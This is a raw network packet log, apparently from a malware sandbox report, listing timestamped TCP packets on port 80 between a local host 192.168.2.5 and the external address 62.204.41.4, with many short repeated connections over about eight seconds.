Feb 7, 2023 19:58:08.033973932 CET	80	49927	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.034065962 CET	49927	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.135957003 CET	49927	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.139622927 CET	49928	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.197504997 CET	80	49927	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.197781086 CET	49927	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.199889898 CET	80	49928	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.200025082 CET	49928	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.200691938 CET	49928	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.260945082 CET	80	49928	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.264710903 CET	80	49928	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.264833927 CET	49928	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.371742010 CET	49928	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.381351948 CET	49929	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.432288885 CET	80	49928	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.433154106 CET	49928	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.442969084 CET	80	49929	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.444921970 CET	49929	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.454291105 CET	49929	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.515816927 CET	80	49929	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.518445015 CET	80	49929	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.518646002 CET	49929	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.620626926 CET	49929	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.621674061 CET	49930	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.681165934 CET	80	49930	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.681375027 CET	49930	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.681863070 CET	49930	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.682292938 CET	80	49929	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.682405949 CET	49929	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.741175890 CET	80	49930	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.744241953 CET	80	49930	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.744489908 CET	49930	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.855335951 CET	49930	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.856240988 CET	49931	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.914957047 CET	80	49930	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.915179014 CET	49930	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.918843031 CET	80	49931	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.919037104 CET	49931	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.920913935 CET	49931	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:08.983799934 CET	80	49931	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.987000942 CET	80	49931	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:08.987251043 CET	49931	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.089246988 CET	49931	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.090138912 CET	49932	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.149542093 CET	80	49932	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.149734020 CET	49932	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.150326967 CET	49932	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.152086973 CET	80	49931	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.152393103 CET	49931	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.209695101 CET	80	49932	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.213221073 CET	80	49932	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.217230082 CET	49932	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.324834108 CET	49932	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.325824022 CET	49933	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.385059118 CET	80	49932	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.385534048 CET	49932	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.386818886 CET	80	49933	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.387053967 CET	49933	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.387567997 CET	49933	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.448848009 CET	80	49933	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.450397968 CET	80	49933	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.450529099 CET	49933	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.561949968 CET	49933	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.562828064 CET	49934	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.622664928 CET	80	49933	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.622802973 CET	49933	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.625185013 CET	80	49934	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.625366926 CET	49934	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.625814915 CET	49934	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.688132048 CET	80	49934	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.691184044 CET	80	49934	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.691384077 CET	49934	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.808126926 CET	49934	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.809009075 CET	49935	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.869465113 CET	80	49935	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.869714975 CET	49935	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.870706081 CET	49935	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.870851994 CET	80	49934	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.870973110 CET	49934	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:09.931149006 CET	80	49935	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.935203075 CET	80	49935	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:09.935384035 CET	49935	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.043153048 CET	49935	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.044053078 CET	49937	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.103526115 CET	80	49935	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.103642941 CET	49935	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.104315996 CET	80	49937	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.104432106 CET	49937	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.104815006 CET	49937	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.165158987 CET	80	49937	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.169941902 CET	80	49937	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.170034885 CET	49937	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.277009964 CET	49937	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.278183937 CET	49938	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.337573051 CET	80	49937	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.337771893 CET	49937	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.340816975 CET	80	49938	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.340955019 CET	49938	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.348629951 CET	49938	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.411232948 CET	80	49938	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.413582087 CET	80	49938	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.413724899 CET	49938	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.530354023 CET	49938	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.531121969 CET	49939	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.591484070 CET	80	49939	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.591613054 CET	49939	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.592369080 CET	49939	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.593051910 CET	80	49938	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.593111992 CET	49938	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.652771950 CET	80	49939	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.654983044 CET	80	49939	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.655066967 CET	49939	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.764043093 CET	49939	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.764940023 CET	49940	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.824609041 CET	80	49939	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.824681044 CET	49939	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.825387001 CET	80	49940	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.825470924 CET	49940	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.825829029 CET	49940	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.886323929 CET	80	49940	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.890811920 CET	80	49940	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:10.890943050 CET	49940	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.995325089 CET	49940	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:10.995944977 CET	49941	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.056046009 CET	80	49940	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.056272030 CET	49940	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.057452917 CET	80	49941	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.057606936 CET	49941	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.058629036 CET	49941	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.120280981 CET	80	49941	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.123760939 CET	80	49941	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.130580902 CET	49941	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.229990959 CET	49941	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.230865002 CET	49942	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.342339039 CET	80	49941	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.342437983 CET	80	49942	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.342591047 CET	49941	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.342638016 CET	49942	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.343154907 CET	49942	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.405627012 CET	80	49942	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.407732964 CET	80	49942	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.412189960 CET	49942	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.527384043 CET	49942	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.528317928 CET	49943	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.589664936 CET	80	49943	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.589826107 CET	49943	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.590298891 CET	49943	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.590929031 CET	80	49942	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.591033936 CET	49942	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.652093887 CET	80	49943	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.654761076 CET	80	49943	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.654860020 CET	49943	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.762018919 CET	49943	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.762811899 CET	49944	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.822527885 CET	80	49943	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.822783947 CET	49943	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.823343039 CET	80	49944	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.827538013 CET	49944	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.828444004 CET	49944	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.888757944 CET	80	49944	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.891484976 CET	80	49944	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:11.891616106 CET	49944	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.995500088 CET	49944	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:11.996318102 CET	49945	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.056026936 CET	80	49944	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.058077097 CET	49944	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.058661938 CET	80	49945	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.059210062 CET	49945	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.060540915 CET	49945	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.122863054 CET	80	49945	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.126838923 CET	80	49945	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.129450083 CET	49945	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.245812893 CET	49945	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.246584892 CET	49946	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.308087111 CET	80	49946	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.308115959 CET	80	49945	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.308319092 CET	49945	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.308322906 CET	49946	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.312159061 CET	49946	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.373703957 CET	80	49946	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.375981092 CET	80	49946	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.376090050 CET	49946	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.480134010 CET	49946	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.480854988 CET	49947	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.541621923 CET	80	49947	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.541734934 CET	49947	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.541774035 CET	80	49946	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.541830063 CET	49946	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.542504072 CET	49947	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.603070974 CET	80	49947	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.605254889 CET	80	49947	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.605359077 CET	49947	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.714844942 CET	49947	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.715724945 CET	49948	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.775687933 CET	80	49947	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.775835991 CET	49947	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.777019024 CET	80	49948	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.777151108 CET	49948	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.777625084 CET	49948	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.838979959 CET	80	49948	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.842132092 CET	80	49948	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:12.842343092 CET	49948	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.950715065 CET	49948	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:12.951733112 CET	49949	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.012288094 CET	80	49948	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.012491941 CET	49948	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.013459921 CET	80	49949	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.013595104 CET	49949	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.013963938 CET	49949	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.075478077 CET	80	49949	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.079219103 CET	80	49949	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.079329014 CET	49949	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.186419010 CET	49949	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.187248945 CET	49950	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.247719049 CET	80	49950	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.247854948 CET	49950	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.249121904 CET	80	49949	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.249245882 CET	49949	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.249773026 CET	49950	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.309467077 CET	80	49950	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.312338114 CET	80	49950	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.312443018 CET	49950	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.417864084 CET	49950	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.418804884 CET	49951	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.477690935 CET	80	49950	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.477813005 CET	49950	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.481400967 CET	80	49951	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.481518984 CET	49951	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.482140064 CET	49951	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.544596910 CET	80	49951	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.546941996 CET	80	49951	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.547081947 CET	49951	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.655459881 CET	49951	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.656306982 CET	49952	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.715537071 CET	80	49952	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.715652943 CET	49952	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.718403101 CET	80	49951	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.718535900 CET	49951	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.723294973 CET	49952	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.782675028 CET	80	49952	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.784904957 CET	80	49952	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.784982920 CET	49952	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.886720896 CET	49952	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.887557030 CET	49953	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.947380066 CET	80	49952	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.947551966 CET	49952	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.949511051 CET	80	49953	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:13.949655056 CET	49953	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:13.951277971 CET	49953	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.012898922 CET	80	49953	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.017504930 CET	80	49953	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.017585993 CET	49953	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.121242046 CET	49953	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.121973038 CET	49954	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.181539059 CET	80	49954	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.181710958 CET	49954	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.183110952 CET	80	49953	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.183201075 CET	49953	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.184521914 CET	49954	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.244051933 CET	80	49954	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.247805119 CET	80	49954	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.247982979 CET	49954	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.355664015 CET	49954	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.356385946 CET	49955	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.415224075 CET	80	49954	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.415916920 CET	49954	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.417702913 CET	80	49955	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.417915106 CET	49955	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.419186115 CET	49955	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.480745077 CET	80	49955	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.483352900 CET	80	49955	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.483532906 CET	49955	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.605067015 CET	49955	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.605691910 CET	49956	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.666846037 CET	80	49955	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.667054892 CET	49955	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.668279886 CET	80	49956	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.671874046 CET	49956	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.672244072 CET	49956	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.734877110 CET	80	49956	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.736835957 CET	80	49956	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.736984968 CET	49956	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.840388060 CET	49956	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.841473103 CET	49957	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.902988911 CET	80	49956	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.903877020 CET	80	49957	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.904059887 CET	49956	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.905021906 CET	49957	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.905021906 CET	49957	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:14.967526913 CET	80	49957	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.969731092 CET	80	49957	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:14.969924927 CET	49957	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.074246883 CET	49957	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.075763941 CET	49958	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.137049913 CET	80	49957	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.137084007 CET	80	49958	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.137125015 CET	49957	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.137224913 CET	49958	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.137845993 CET	49958	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.199127913 CET	80	49958	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.202464104 CET	80	49958	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.202652931 CET	49958	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.308754921 CET	49958	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.310045004 CET	49959	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.370223999 CET	80	49958	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.370388031 CET	49958	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.370611906 CET	80	49959	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.370755911 CET	49959	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.371241093 CET	49959	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.431792021 CET	80	49959	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.434111118 CET	80	49959	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.434293032 CET	49959	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.543072939 CET	49959	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.543953896 CET	49960	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.603482962 CET	80	49960	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.603564024 CET	80	49959	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.603835106 CET	49959	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.603871107 CET	49960	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.604284048 CET	49960	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.663785934 CET	80	49960	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.666282892 CET	80	49960	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.666428089 CET	49960	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.778217077 CET	49960	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.779274940 CET	49961	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.838062048 CET	80	49960	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.838313103 CET	49960	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.840802908 CET	80	49961	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.841047049 CET	49961	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.841480017 CET	49961	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:15.903724909 CET	80	49961	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.906101942 CET	80	49961	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:15.906224012 CET	49961	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.023580074 CET	49961	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.024488926 CET	49962	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.085479975 CET	80	49961	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.085596085 CET	49961	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.087119102 CET	80	49962	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.087239981 CET	49962	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.087938070 CET	49962	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.151374102 CET	80	49962	62.204.41.4	192.168.2.5
